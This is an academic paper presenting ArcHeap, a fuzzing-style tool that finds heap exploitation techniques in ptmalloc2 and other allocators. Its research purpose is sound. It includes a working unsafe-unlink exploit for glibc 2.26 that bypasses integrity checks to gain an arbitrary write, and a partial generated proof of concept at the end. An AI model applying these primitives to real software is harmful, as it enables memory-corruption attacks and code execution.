
Automatic Techniques to Systematically Discover New Heap Exploitation Primitives

Insu Yun† Dhaval Kapil‡ Taesoo Kim†


† Georgia Institute of Technology ‡ Facebook

Abstract

Exploitation techniques to abuse metadata of heap allocators have been widely studied because of their generality (i.e., application independence) and powerfulness (i.e., bypassing modern mitigation). However, such techniques are commonly considered an art, and thus the ways to discover them remain ad-hoc, manual, and allocator-specific.

In this paper, we present an automatic tool, ArcHeap, to systematically discover the unexplored heap exploitation primitives, regardless of their underlying implementations. The key idea of ArcHeap is to let the computer autonomously explore the spaces, similar in concept to fuzzing, by specifying a set of common designs of modern heap allocators and root causes of vulnerabilities as models, and by providing heap operations and attack capabilities as actions. During the exploration, ArcHeap checks whether the combinations of these actions can be potentially used to construct exploitation primitives, such as arbitrary write or overlapped chunks. As a proof, ArcHeap generates a working PoC that demonstrates the discovered exploitation technique.

We evaluated ArcHeap with ptmalloc2 and 10 other allocators, and discovered five previously unknown exploitation techniques in ptmalloc2 as well as several techniques against seven out of 10 allocators including the security-focused allocator, DieHarder. To show the effectiveness of ArcHeap's approach in other domains, we also studied how security features and exploit primitives evolve across different versions of ptmalloc2.

1 Introduction

Heap-related vulnerabilities have been the most common, yet critical source of security problems in systems software [42, 64, 65, 71]. According to Microsoft, heap vulnerabilities accounted for 53% of security problems in their products in 2017 [48]. One way to exploit these vulnerabilities is to use heap exploitation techniques [61], which abuse underlying allocators. There are two properties that make these techniques preferable for attacks. First, heap exploitation techniques tend to be application-independent, making it possible to write exploits without a deep understanding of application internals. Second, heap vulnerabilities are typically so powerful that attackers can bypass modern mitigation schemes by abusing them. For example, a seemingly benign bug that overwrites one NULL byte to the metadata of ptmalloc2 leads to a privilege escalation on Chrome OS [2].

Heap exploitation techniques have steadily been used in real-world exploits. To show that, we collected successful exploits for heap vulnerabilities leading to arbitrary code execution from the well-known exploit database, exploit-db [50]. As shown in Table 1, heap exploitation techniques were one of the favorable ways to compromise software when ASLR was not implemented (24 / 52 exploits). Even after ASLR is deployed, heap bugs in non-scriptable programs are frequently exploited via heap exploitation techniques (10 / 21 exploits). Not to mention, popular software such as the Exim mail server [47], WhatsApp [6] and VMware ESXi [77] were all hijacked via heap exploitation techniques in 2019. Note that scriptable programs provide much simpler, flexible exploitation techniques, so using heap exploitation techniques is not yet preferred by an attacker: e.g., corrupting an array-like structure to achieve arbitrary reads and writes.

                            Before ASLR             After ASLR
Target programs             02-04  05-07  Total     08-10  11-13  14-16  17-19  Total
Scriptable                      0     12     12        13     29     11      4     57
Non-scriptable                  9      7     16         5      1      3      2     11
(via heap exploit techs)       12     12     24         3      4      1      2     10
Scriptable: Software accepting a script language (e.g., web browsers or PDF readers).

Table 1: The number of exploitations that lead to code execution from heap vulnerabilities in exploit-db [50]. A heap exploit technique is one of the popular methods used to compromise non-scriptable programs; bugs in scriptable programs typically allow a much easier, simpler way for exploitation, requiring no use of the heap exploitation technique.

Communities have been studying possible attack techniques against heap vulnerabilities (see Table 2), but finding such techniques is often considered an art, and thus the approaches used to discover them remain ad-hoc, manual and allocator-specific at best. Unfortunately, such a trend makes it hard for communities to understand the security implications of various heap allocators (or even across different versions).
For example, when tcache was recently introduced in ptmalloc2 to improve the performance with a per-thread cache, its security was improperly evaluated (i.e., insufficient integrity checks for allocation or free [17, 37]), enabling an easier way for exploitation. Moreover, existing studies for heap exploitation techniques are highly biased; only ptmalloc2 is exhaustively considered (e.g., missing DieHarder [49]).

2001 • (1) Once upon a free()... [1]
2003 • (1) Advanced Doug Lea's malloc exploits [38]
2004 • (2) Exploiting the wilderness [55]
2007 • (2) The use of set_head to defeat the wilderness [25]
2007 • (3) Understanding the heap by breaking it [20]
2009 • (1) Yet another free() exploitation technique [36]
2009 • (6) Malloc Des-Maleficarum [7]
2010 • (2) The house of lore: Reloaded [8]
2014 • (1) The poisoned NUL byte, 2014 edition [18]
2015 • (2) Glibc adventures: The forgotten chunk [28]
2016 • (3) Ptmalloc fanzine [37]
2016 • (3) New exploit methods against Ptmalloc of Glibc [72]
2016 • (1) House of Einherjar [66]
2018 • (5) ArcHeap

Table 2: Timeline for new heap exploitation techniques discovered and their count in parentheses (e.g., ArcHeap found five new techniques in 2018).

Allocators B I C Description (applications)
ptmalloc2 ✓ ✓ ✓ A default allocator in Linux.
dlmalloc ✓ ✓ ✓ An allocator that ptmalloc2 is based on.
jemalloc ✓ ✓ A default allocator in FreeBSD.
tcmalloc ✓ ✓ ✓ A high-performance allocator from Google.
PartitionAlloc ✓ ✓ A default allocator in Chromium.
libumem ✓ ✓ A default allocator in Solaris.
B: Binning, I: In-place metadata, C: Cardinal data

Table 3: Common designs used in various memory allocators. This table shows that even though their detailed implementations could be different, heap allocators share common designs that can be exploited for automatic testing.

In this paper, we present an automatic tool, ArcHeap, to systematically discover the unexplored heap exploitation primitives, regardless of their underlying implementations. The key idea of ArcHeap is to let the computer autonomously explore the spaces, similar in concept to fuzzing, which is proven to be practical and effective in discovering software bugs [29, 75].

However, it is non-trivial to apply classical fuzzing techniques to discover new heap exploitation primitives for three reasons. First, to successfully trigger a heap vulnerability, it must generate a particular sequence of steps with exact data, quickly rendering the problem intractable using fuzzing approaches. Accordingly, researchers attempted to tackle this problem using symbolic execution instead, but stumbled over the well-known state explosion problem, thereby limiting its scope to validating known exploitation techniques [17]. Second, we need to devise a fast way to estimate the possibility of heap exploitation, as fuzzing requires clear signals, such as segmentation faults, to recognize interesting test cases. Third, the test cases generated by fuzzers are typically redundant and obscure, so users are required to spend non-negligible time and effort analyzing the final results.

The key intuition to overcome these challenges (i.e., reducing search space) is to abstract the internals of heap allocators and the root causes of heap vulnerabilities (see §3.1). In particular, we observed that modern heap allocators share three common design components, namely, binning, in-place metadata, and cardinal data. On top of these models, we directed ArcHeap to mutate and synthesize heap operations and attack capabilities. During the exploration, ArcHeap checks whether the generated test case can be potentially used to construct exploitation primitives, such as arbitrary writes or overlapped chunks; we devised shadow-memory-based detection for efficient evaluation (see §5.3). Whenever ArcHeap finds a new exploit primitive, it generates working PoC code using delta-debugging [76] to reduce redundant test cases to a minimal, equivalent class.

We evaluated ArcHeap with ptmalloc2 and 10 other allocators. As a result, we discovered five new exploit techniques against Linux's default heap allocator, ptmalloc2. ArcHeap's approach can be extended beyond ptmalloc2; ArcHeap found several exploit primitives against other popular heap allocators, such as tcmalloc and jemalloc. Moreover, by disclosing unexpected exploit primitives, ArcHeap identified three implementation bugs in DieHarder, Mesh [56], and mimalloc, respectively.

The closest related work to ArcHeap is HeapHopper [17], which verifies existing heap exploit techniques using symbolic execution. Compared with HeapHopper, ArcHeap outperforms it in finding new techniques; none of the new techniques from ArcHeap are found by HeapHopper. Moreover, unlike HeapHopper, ArcHeap is independent of exploit-specific information, which is unavailable in finding new techniques; HeapHopper found only three out of eight known techniques in ptmalloc2 without the prior knowledge, while ArcHeap found all eight. This shows that HeapHopper is ineffective for this new task (i.e., finding new exploit techniques), justifying the need for this new tool.

To show the effectiveness of ArcHeap's approach in other domains, we also studied how exploit primitives evolve across different versions of ptmalloc2, demonstrating the need for an automated method to evaluate the security of heap allocators. To foster further research, we open-source ArcHeap at https://github.com/sslab-gatech/ArcHeap.

In summary, we make the following contributions:
• We show that heap allocators share common designs, and we devise an efficient method to evaluate exploitation techniques using shadow memory.
• We design, implement, and evaluate our prototype, ArcHeap, a tool that automatically discovers heap exploitation techniques against various allocators.
• ArcHeap found five new techniques in ptmalloc2 and several techniques in various allocators, including tcmalloc, jemalloc, and DieHarder, and it outperforms a state-of-the-art tool, HeapHopper, in finding new exploitation techniques.
2 Analysis of Heap Allocators

2.1 Modern Heap Allocators

Dynamic memory allocation [41] plays an essential role in managing a program's heap space. The C standard library defines a set of APIs to manage dynamic memory allocations such as malloc() and free() [24]. For example, malloc() allocates the given number of bytes and returns a pointer to the allocated memory, and free() reclaims the memory specified by the given pointer.

A variety of heap allocators [19, 26, 41, 43, 45, 49, 56, 59, 64, 65] have been developed to meet the specific needs of target programs. Heap allocators have two types of common goals: good performance and a small memory footprint, that is, minimizing the memory usage as well as reducing fragmentation, which is the unused memory (i.e., hole) among in-use memory blocks. Unfortunately, these two desirable properties are fundamentally conflicting; an allocator should minimize additional operations to achieve good performance, whereas it requires additional operations to minimize fragmentation. Therefore, the goal of an allocator is typically to find a good balance between these two goals for its workloads.

Common designs. In analyzing various heap allocators, we found their common design principles shown in Table 3: binning, in-place metadata, and cardinal data. Many allocators use size-based classification, known as binning. In particular, they partition a whole size range into multiple groups to manage memory blocks deliberately according to their size groups; small-size blocks focus on performance, and large-size blocks focus on memory usage of the allocators. Moreover, by dividing size groups, when they try to find the best-fit block (the smallest but sufficient block for a given request), they scan only blocks in the proper size group instead of scanning all memory blocks.

Moreover, many dynamic memory allocators place metadata near the payload, called in-place metadata, even though some allocators avoid this because of security problems from corrupted metadata in the presence of memory corruption bugs (see Table 3). To minimize memory fragmentation, a memory allocator should maintain information about allocated or freed memory in metadata. Even though the allocator can place metadata and payload in distinct locations, many allocators store the metadata near the payload (i.e., a head or a tail of a chunk) to increase locality. In particular, by connecting metadata and payload, an allocator can get benefits from the cache, resulting in performance improvement.

Further, memory allocators contain only cardinal data that are not encoded and essential for fast lookup and memory usage. In particular, metadata are mostly pointers or size-related values that are used for their data structures. For example, ptmalloc2 stores a raw pointer for a linked list that is used to maintain freed memory blocks.

This observation has been leveraged to devise the universal method to test various allocators regardless of their implementations (see §5.2). First, our approach should consider binning to explore multiple size groups of an allocator. For example, if we just uniformly pick a size in the 2^64 space, the probability of choosing the smallest size group in ptmalloc2 (< 2^7) becomes nearly zero (2^-57). Thus, we need to use a better sampling method considering binning. Moreover, the other two design principles (in-place and cardinal metadata) limit the locations and domains of metadata, reducing the search space. Under these design principles, we only need to focus on metadata in the boundary of a chunk with specific forms (i.e., pointers or sizes).

2.2 ptmalloc2: glibc's Heap Allocator

In this section, we discuss ptmalloc2 [22, 23, 27], the heap allocator used in glibc, whose exploitation techniques have been heavily studied because of its prevalence and its complexity of metadata [1, 3, 7, 18, 20, 25, 36, 38, 55]. Similar to other work [17, 58], we will use ptmalloc2 as our default allocator for further discussions.

    struct malloc_chunk {
      // size of "previous" chunk
      // (only valid when the previous chunk is freed, P=0)
      size_t prev_size;
      // size in bytes (aligned by double words): lower bits
      // indicate various states of the current/previous chunk
      //   A: alloced in a non-main arena
      //   M: mmapped
      //   P: "previous" in use (i.e., P=0 means freed)
      size_t size;
      // double links for free chunks in small/large bins
      // (only valid when this chunk is freed)
      struct malloc_chunk* fd;
      struct malloc_chunk* bk;
      // double links for next larger/smaller size in largebins
      // (only valid when this chunk is freed)
      struct malloc_chunk* fd_nextsize;
      struct malloc_chunk* bk_nextsize;
    };

[Figure 1 diagram: memory layout of (a) an allocated chunk and (b) a free chunk (e.g., small bin). In (a), malloc() returns a pointer to the payload that follows the size field (with flag bits A, M, P), and the next chunk's size field has P=1. In (b), after free(ptr), fd and bk are linked to the next free chunks, the next chunk's prev_size equals this chunk's size, and its size field has P=0.]

Figure 1: Metadata for a chunk in ptmalloc2 and memory layout for the in-use and freed chunks [23].

Metadata. A chunk in ptmalloc2 is a memory region containing metadata and payload. Memory allocation APIs such as malloc() return the address of the payload in the chunk. Figure 1 shows the metadata of a chunk and its memory layout for an in-use and a freed chunk. prev_size represents the size of a previous chunk if it is freed. Although the prev_size of a chunk overlaps with the payload of the previous chunk, this is legitimate since prev_size is considered only after the previous chunk is freed, i.e., the payload is no longer used. size represents the size of a current chunk. The real size of the chunk is 8-byte aligned, and the 3 LSBs of the size are
used for storing the state of the chunk. The last bit of size, called PREV_IN_USE (P), shows whether the previous chunk is in use. For example, in Figure 1, after the chunk is freed, the PREV_IN_USE in the next chunk is changed from 1 to 0. Other metadata, fd, bk, fd_nextsize, and bk_nextsize, are used to maintain linked lists that hold freed chunks.

Binning. ptmalloc2 has several types of bins: fast bin, small bin, large bin, unsorted bin, and tcache [15]. Each bin has its own characteristics to achieve its goal; a fast bin uses a single-linked list, giving up merging for performance, but a small bin merges its freed chunks to reduce fragmentation. Moreover, a large bin stores chunks that have different sizes to handle arbitrarily large chunks. To optimize scanning for the best-fit chunk, a large bin maintains another sorted, double-linked list. The unsorted bin is a special bin that serves as a fast staging place for free chunks. If a chunk is freed, it first moves to the unsorted bin and is used to serve the subsequent allocation. If the chunk is not suitable for the request, it will move to a regular bin (i.e., a small bin or a large bin). Using the unsorted bin, ptmalloc2 can increase locality for performance by deferring the decision for the regular bins. The tcache, a per-thread cache, is enabled by default from glibc 2.26. It works similarly to a fast bin but requires no locking for threads, and therefore it can achieve significant performance improvements for multithreaded programs [15].

2.3 Complex Modern Heap Exploits

Heap exploit techniques have recently become much more subtle and sophisticated to bypass the new security checks introduced in the allocators. If an attacker finds a vulnerability that corrupts heap metadata (e.g., overflow) or improperly uses heap APIs (e.g., double free), the next step is to develop the bug into a more useful exploit primitive such as arbitrary write. To do so, attackers typically have to modify the heap metadata, craft a fake chunk, or call other heap APIs according to the implementation of the target heap allocator. This development was trivial in the good old days for attackers; they could use the universal technique for most allocators (e.g., unsafe unlink). However, it became complicated after many security checks were introduced to respond to such attacks. Therefore, researchers have studied and shared heap exploitation techniques that are reusable methods to develop vulnerabilities into useful attack primitives [1, 3, 7, 18, 20, 25, 36, 38, 55, 66, 72]. Table 4 summarizes modern heap exploitation techniques from previous work [17] and new ones that our tool, ArcHeap, found.

Example: Unsafe unlink. One of the most famous heap exploitation techniques is the unsafe unlink attack that abuses the unlink mechanism of double-linked lists in heap allocators, as illustrated in Figure 2a. By modifying a forward pointer (P->fd) into a properly encoded location and a backward pointer (P->bk) into a desired value, attackers can achieve arbitrary writes (see P->fd->bk = P->bk). Due to the prevalence of double-linked lists, this technique was used for many allocators, including dlmalloc, ptmalloc2, and even the Windows allocator [1].

    #define unlink(AV, P, BK, FD)                                  \
      /* (1) checking if size == the next chunk's prev_size */     \
      if (chunksize(P) != prev_size(next_chunk(P)))                \
        malloc_printerr("corrupted size vs. prev_size");           \
      FD = P->fd;                                                  \
      BK = P->bk;                                                  \
      /* (2) checking if prev/next chunks correctly point */       \
      if (FD->bk != P || BK->fd != P)                              \
        malloc_printerr("corrupted double-linked list");           \
      else {                                                       \
        FD->bk = BK;                                               \
        BK->fd = FD;                                               \
        ...                                                        \
      }

(a) Security checks introduced since glibc 2.3.4 and 2.26. Two security checks first validate two invariants (see comments above) before unlinking the victim chunk (i.e., P).

    // [PRE-CONDITION]
    //   sz : any non-fast-bin size
    //   dst: where to write (void*)
    //   val: target value
    // [BUG] buffer overflow (p1)
    // [POST-CONDITION] *dst = val
    void *p1 = malloc(sz);
    void *p2 = malloc(sz);
    struct malloc_chunk *fake = p1;
    // bypassing (1): P->size == next_chunk(P)->prev_size.
    // If fake->size = 0, next_chunk(fake)->prev_size
    // will point to fake->prev_size. By setting both values
    // to zero, we can bypass the check. These assignments
    // can be omitted since heap memory is zeroed out at
    // first time of execution.
    fake->prev_size = fake->size = 0;
    // bypassing (2): P->fd->bk == P && P->bk->fd == P
    // (the pointers are derived from &p1 so that unlink()
    //  rewrites p1 itself, as the assertion below expects)
    fake->fd = (void*)&p1 - offsetof(struct malloc_chunk, bk);
    fake->bk = (void*)&p1 - offsetof(struct malloc_chunk, fd);
    struct malloc_chunk *c2 = raw_to_chunk(p2);
    // it shrinks the previous chunk's size,
    // tricking 'fake' as the previous chunk
    c2->prev_size = chunk_size(sz)
                    - offsetof(struct malloc_chunk, fd);
    // [BUG] overflowing p1 to modify c2's size:
    // tricking the previous chunk freed, P=0
    c2->size &= ~1;
    // triggering unlink(fake) via backward consolidation
    free(p2);
    assert(p1 == (void*)&p1 - offsetof(struct malloc_chunk, bk));
    // writing with p1: overwriting itself to dst
    *(void**)(p1 + offsetof(struct malloc_chunk, bk)) = dst;
    // writing with p1: overwriting *dst with val
    *(void**)p1 = (void*)val;
    assert(*dst == val);

(b) The unsafe unlink exploitation in glibc 2.26

Figure 2: The unlink macros and an exploit abusing the mechanism in glibc 2.26. Compared to old glibc, two security checks have been added in glibc 2.26. The first one hardens against the off-by-one overflow, and the second one hardens against unlinking abuse. Even though the security checks make the attack harder, they can still be bypassed.

To mitigate this attack, allocators have added the new security check shown in Figure 2a, which turns out to be insufficient to prevent more advanced attacks. The check verifies an invariant of a double-linked list that a backward pointer of a forward pointer of a chunk should point to the chunk (i.e., P->fd->bk == P) and vice versa. Therefore, attackers cannot make the pointer directly refer to arbitrary locations as before since the pointer will not hold the invariant. Even though the check prevents the aforementioned attack, attackers can avoid this check by making a fake chunk to meet the condition, as
Name Abbr. Description New
Fast bin dup FD Corrupting a fast bin freelist (e.g., by double free or write-after-free) to return an arbitrary location
Unsafe unlink UU Abusing unlinking in a freelist to get arbitrary write
House of spirit HS Freeing a fake chunk of fast bin to return arbitrary location
Poison null byte PN Corrupting heap chunk size to consolidate chunks even in the presence of allocated heap
House of lore HL Abusing the small bin freelist to return an arbitrary location
Overlapping chunks OC Corrupting a chunk size in the unsorted bin to overlap with an allocated heap
House of force HF Corrupting the top chunk to return an arbitrary location
Unsorted bin attack UB Corrupting a freed chunk in the unsorted bin to write an uncontrollable value to an arbitrary location
House of einherjar HE Corrupting PREV_IN_USE to consolidate chunks to return an arbitrary location that requires a heap address
Unsorted bin into stack UBS Abusing the unsorted freelist to return an arbitrary location ✓
House of unsorted einherjar HUE A variant of house of einherjar that does not require a heap address ✓
Unaligned double free UDF Corrupting a small bin freelist to return already allocated heap ✓
Overlapping small chunks OCS Corrupting a chunk size in a small bin to overlap chunks ✓
Fast bin into other bin FDO Corrupting a fast bin freelist and use malloc_consolidate() to return an arbitrary non-fast-bin chunk ✓

Table 4: Modern heap exploitation techniques from recent work [17] including new ones found by ArcHeap in ptmalloc2 with abbreviations
and brief descriptions. For brevity, we omitted tcache-related techniques.

in Figure 2b. Compared to the previous one, the check makes the exploitation more complicated, but still feasible.

3 Heap Abstract Model

In this section, we discuss our heap abstract model, which enables us to describe a heap exploit technique independent from an underlying allocator. Here, we focus on an adversarial model, omitting obvious heap APIs (i.e., malloc and free) for brevity. Note that this abstraction is consistent with related work [17, 58].

3.1 Abstracting Heap Exploitation

Our model abstracts a heap technique in two aspects: 1) types of bugs (i.e., allowing an attacker to divert the program into unexpected states), and 2) impact of exploitation (i.e., describing what an attacker can achieve as a result). This section elaborates on each of these aspects.

1) Types of bugs. Four common types of heap-related bugs instantiate exploitation:
• Overflow (OF): Writing beyond an object boundary.
• Write-after-free (WF): Reusing a freed object.
• Arbitrary free (AF): Freeing an arbitrary pointer.
• Double free (DF): Freeing a reclaimed object.
Each of these mistakes of a developer allows attackers to divert the program into unexpected states in a certain way: overflow allows modification of all the metadata (e.g., struct malloc_chunk in Figure 1) of any consequent chunks; write-after-free allows modification of the free metadata (e.g., fd/bk in Figure 1), which is similar in spirit to use-after-free; double free allows violation of the operational integrity of the internal heap metadata (e.g., multiple reclaimed pointers linked in the heap structure); and arbitrary free similarly breaks the operational integrity of the heap management but in a highly controlled manner, namely by freeing an object with the crafted metadata. Since overflow enables a variety of paths for exploitation, we further characterize its types based on common mistakes and errors by developers.
• Off-by-one (O1): Overwriting the last byte of the next consequent chunk (e.g., when making a mistake in size calculation, such as CVE-2016-5180 [31]).
• Off-by-one NULL (O1N): Similar to the previous type, but overwriting the NULL byte (e.g., when using string-related libraries such as sprintf).

It is worth noting that, unlike a typical exploit scenario that assumes arbitrary reads and writes, we exclude such primitives for two reasons: they are too specific to applications and execution contexts, hardly meaningful for generalization, and they are so powerful that attackers can launch easier attacks with them, demotivating use of heap exploitation techniques. Therefore, such powerful primitives are considered one of the ultimate goals of heap exploitation.

2) Impact of exploitation. The goal of each heap exploitation technique is to develop common types of heap-related bugs into more powerful exploit primitives for full-fledged attacks. For the systematization of a heap exploit, we categorize its final impact (i.e., an achieved exploit primitive) into four classes:
• Arbitrary-chunk (AC): Hijacking the next malloc to return an arbitrary pointer of choice.
• Overlapping-chunk (OC): Hijacking the next malloc to return a chunk inside a controllable (e.g., overwritable) chunk by an attacker.
• Arbitrary-write (AW): Developing the heap vulnerability into an arbitrary write (a write-where-what primitive).
• Restricted-write (RW): Similar to arbitrary-write, but with various restrictions (e.g., non-controllable "what", such as a pointer to a global heap structure).
Attackers want to hijack control by using these exploit primitives combined with application-specific execution contexts. For example, in the unsafe unlink (see Figure 2), attackers can develop heap overflow to arbitrary writes and corrupt code pointers to hijack control.

3.2 Threat Model

To commonly describe heap exploitation techniques, we clarify legitimate actions that an attacker can launch. First, an attacker can allocate an object with an arbitrary size, and free objects in an arbitrary order. This essentially means that the attacker can invoke an arbitrary number of malloc calls with an arbitrary size parameter and invoke free (or not) in whatever order the attacker wishes. Second, the attacker can write arbitrary data on legitimate memory regions (i.e.,
the payload in Figure 1 or global memory). Although such Heap action generator PoC generator
legitimate behaviors largely depend on applications in theory, Generate random Minimize actions
heap actions using delta-debugging
assuming this powerful model lets us examine all potential Model (§5.2) (§5.4) PoC
specification exploit
opportunities for abuses. Third, the attacker can trigger only a
single type of bug. This limits the capabilities of the adversary Execute actions and Generate PoC exploit
to the realistic setting. However, we allow multiple uses of detect impacts (§5.3) (§5.4)

the same type to simulate a re-triggerable bug in practice. We


note that it is always more favorable to an attacker if a heap Figure 3: Overview of A RC H EAP. It first generates heap actions
exploit technique requires fewer capabilities than what are according to an optional model specification. While executing the
generated actions, it estimates the impact of exploitation. Whenever
described here, and in such cases, we make a side note for
a new exploit is found, it minimizes the actions and produces Proof-
better clarification. of-Concept (PoC) code.
4 Technical Challenges

Our goal is to automatically explore new types of heap exploitation techniques given an implementation of any heap allocator; as with AFL [75], its source code is not required. Such a capability not only supports automatic exploit synthesis but also enables several unprecedented applications: 1) systematically discovering unknown types of heap exploitation schemes; 2) comprehensively evaluating the security of popular heap allocators; and 3) providing insight into what to improve in their security and how. However, achieving this autonomous capability is far from trivial, for the following reasons.

Autonomous reasoning of the heap space. To find heap exploitation techniques, we should satisfy complicated constraints to bypass security checks (see §2.3) in a large search space consisting of an enormous number of possible call orders, arguments for heap APIs, and data in the heap and global buffer. This space could be greatly reduced using exploit-specific knowledge [17]; however, this is not applicable for finding new exploit techniques. To resolve this issue, we use a random search algorithm that is effective in exploring a large search space [33]. We also abstract common designs of modern heap allocators to further reduce the search space (§5.2).

Devising exploitation techniques. While enumerating possible candidates for exploit techniques, a system needs to verify whether the candidates are valuable. One way to assess the candidates is to synthesize end-to-end exploits automatically (e.g., spawning a shell), but this is extremely difficult and inefficient, especially for heap vulnerabilities [4, 11, 16, 33, 58, 60]. To resolve this issue, we use the concept of impact of exploitation. In particular, we estimate the impacts of exploitation (i.e., AC, OC, AW, and RW) during exploration instead of synthesizing a full exploit. We show that these impacts can be detected quickly at runtime by utilizing shadow memory (§5.3).

Normalization. Even though a random search is effective in exploring a large search space, an exploitation technique found by this algorithm tends to be redundant and inessential, requiring non-trivial time to analyze the result. To fix this issue, we leverage the delta-debugging technique [76] to minimize the redundant actions and transform the found result into an essential class. This is so effective that we could reduce actions by 84.3%, drastically helping us to share the new exploitation techniques with the community (§5.4).

5 Autonomous Exploration for Finding Heap Exploitation Techniques

5.1 Overview

ArcHeap follows a common paradigm in classical fuzzing (test generation, crash detection, and test reduction) but is tailored to heap exploitation (see Figure 3). It first generates a sequence of heap actions based on a user-provided model specification. This specification is optional; if it is not given, ArcHeap will generate every possible action. Heap actions that ArcHeap can formulate include heap allocation, free, buffer writes, heap writes, and bug invocation (§5.2). During execution, ArcHeap evaluates whether the executed test case results in impacts of exploitation, similar in concept to detecting a crash in fuzzing (§5.3). Whenever ArcHeap finds a new exploit, it minimizes the heap actions and produces PoC code (see Figure 5), which contains only an essential set of actions (§5.4). It is worth noting that this minimization helps post-analysis of a found technique but is irrelevant to false positives; ArcHeap yielded no false positive during our evaluation thanks to its straightforward analysis at runtime.

5.2 Generating Actions for Abstract Heap

ArcHeap randomly generates five types of heap-related actions: allocation, deallocation, buffer writes, heap writes, and bug invocation. To reduce the search space, ArcHeap formulates each action on top of an abstract heap model using the common design idioms of modern allocators. The following explains how each action takes advantage of the designs in reducing the search space.

Allocation. The first action that ArcHeap can perform is allocating memory through the standardized API, malloc(). After allocating memory, ArcHeap stores the returned object's address to its internal data structure, called the container. It also stores a chunk size of the object using another API, malloc_usable_size(), and its status (i.e., allocated) for further use in other actions (Lines 15-23 in Figure 4), e.g., deallocation or bug invocation.

ArcHeap allocates memory of random sizes while considering several aspects to test an allocator. First of all, ArcHeap carefully chooses a size of an object (I1 in Table 5) to examine different logic in different bins. In particular, ArcHeap first randomly selects a group of sizes and then allocates an object whose size is in this group. The groups are separated by approximate boundary values instead of implementation-specific ones to make ArcHeap compatible with any allocator. Currently, ArcHeap uses four boundaries with exponential distance from 2^0 to 2^20, e.g., the first group is [2^0, 2^5), the second one is [2^5, 2^10), etc. This makes a small size likely to be chosen. For instance, the chance of making a fast-bin object in ptmalloc2 becomes more than 1/4 (i.e., the chance to select the first group), which was 2^-57 in the uniform sampling. This division is arbitrary but sufficient for increasing the probability of exploring various bins.

ArcHeap also attempts to allocate multiple objects in the same bin (I2) since an object interacts with others in the same bin. For example, in ptmalloc2, a non-fast-bin object merges only with another non-fast-bin object, not with a fast-bin object. To cover this interaction, ArcHeap allocates an object whose size is related to the other object's size.

To find techniques induced by common mistakes in an allocator, ArcHeap also uses specialized sizes (I3, I4). In particular, ArcHeap uses the differences between pointers to find integer overflow vulnerabilities in an allocator. For example, a vulnerable allocator can return a buffer address when claiming a very large chunk whose size is the same as the difference between the buffer and a heap object. ArcHeap also utilizes several pre-defined constants, e.g., zero or negative numbers, to evaluate the allocator's edge case handling. This is analogous to classical fuzzing, which uses a fixed set of integers to check corner conditions (e.g., interesting values in AFL [75]).

  Name  Description               Align  Trans   Model
  I1    Random size (binning)
  I2    Chunk size of a chunk            ax + b
  I3    Pre-defined constants
  I4    Offsets between pointers  ✓      x + b   HA, BA, CA
  P1    NULL
  P2    The buffer address        ✓      x + b   BA
  P3    A heap address            ✓      x + b   HA
  P4    The container address     ✓      x + b   CA
  I: Integer strategy, P: Pointer strategy, HA: Heap address, BA: Buffer address, CA: Container address

Table 5: Strategies for generating random values by ArcHeap. ArcHeap has two types of strategies: the integer type and the pointer type. It generates the values according to alignment, transformation, and the given model (see §5.1) of each type.

Deallocation. ArcHeap deallocates a randomly selected heap pointer from the heap container using free(). To avoid launching a double free bug, which will be emulated in the bug invocation action, ArcHeap checks an object's status. If ArcHeap chooses an already freed pointer, it simply ignores the deallocation action to avoid the bug (Lines 24-30).

   1 void check_shadow(bool arbitrary) {
   2   // check shadow memory and report ARBITRARY_WRITE
   3   // if arbitrary is true, otherwise RESTRICTED_WRITE
   4 }
   5 void check_overlap(void** ptr) {
   6   // check overlaps of ptr with other chunks, buffer, or container
   7 }
   8 void* random_size() {
   9   // generate random size using the integer strategies in Table 5
  10   // note that it only uses container and buffer, not their shadow
  11 }
  12 void* random_value() {
  13   // similar to random_size(), but use all strategies in Table 5
  14 }
  15 void allocate() {
  16   void** ptr = malloc(random_size());
  17   check_shadow(false);
  18   check_overlap(ptr);
  19   allocated[ptr_id] = true;
  20   chunk_sizes[ptr_id] = malloc_usable_size(ptr);
  21   container[ptr_id] = container_shadow[ptr_id] = ptr;
  22   ptr_id++;
  23 }
  24 void deallocate() {
  25   int index = rand() % ptr_id;
  26   if (!allocated[index]) return;
  27   allocated[index] = false;
  28   free(container[index]);
  29   check_shadow(false);
  30 }
  31 void heap_write() {
  32   int index = rand() % ptr_id;
  33   if (!allocated[index]) return;
  34   void** ptr = container[index];
  35   size_t num = rand() % MAX_WRITE + 1;
  36   size_t start = 0, end = num; // a head of the chunk
  37   if (rand() % 2) { // a tail of the chunk
  38     end = chunk_sizes[index] / (sizeof(void*));
  39     start = end - num;
  40   }
  41   for (size_t i = start; i < end; i++)
  42     ptr[i] = random_value();
  43   check_shadow(true);
  44 }
  45 void buffer_write() {
  46   int index = rand() % MAX_BUF;
  47   size_t num = rand() % MAX_WRITE + 1;
  48   for (int i = 0; i < num; i++)
  49     buffer[i] = buffer_shadow[i] = random_value();
  50   check_shadow(true);
  51 }

Figure 4: Pseudocode for generating actions in ArcHeap. To save space, we omitted several functions, sanity checks, and variable declarations that can be inferred.

Heap & Buffer write. The next action that ArcHeap can formulate is writing random data to a heap object or the global buffer. As mentioned above, to find heap exploitation techniques, written data should be accurate in terms of their positions and values, rendering classical fuzzing (i.e., purely random generation) infeasible. To overcome such limitations, ArcHeap exploits the in-place and cardinal metadata design of heap allocators to prune its search space. In particular, ArcHeap writes only a limited number of values (noted as MAX_WRITE in the pseudocode, which is eight in our prototype) from the start or the end of an object (see Lines 31-51 in Figure 4) since an allocator stores its metadata near the boundary for locality (in-place metadata). Further, ArcHeap generates random values (see Table 5) that can be used for sizes or pointers in an allocator instead of fully random ones (cardinal data).

To explore various exploit techniques, ArcHeap introduces systematic noise to generated values. In particular, ArcHeap modifies a value using linear (addition and multiplication) or shift transformation (addition only) according to the value's type. For example, a heap address can be shifted by word granularity (i.e., respecting alignment); however,
  p[0] = malloc(760); // ❶
  p[1] = malloc(776);
  // struct malloc_chunk *fake = p[1];
  // bypassing (1): P->size == next(P)->prev_size
  // since fake->size = next(fake)->prev_size = 0 by default
  // bypassing (2): P->fd->bk == P && P->bk->fd == P
  // NOTE: offsetof(fd) = 16, offsetof(bk) = 24
  *(uintptr_t*)(p[1] + 16) = (uintptr_t)&p[1] + -24;
  // fake->fd->bk = *(&p[1] - 24 + 24) = p[1] == fake
  *(uintptr_t*)(p[1] + 24) = (uintptr_t)&p[1] + -16;
  // fake->bk->fd = *(&p[1] - 16 + 16) = p[1] == fake
  p[2] = malloc(760);
  // shrink p[2]'s prev_size, making 'fake' as its prev chunk
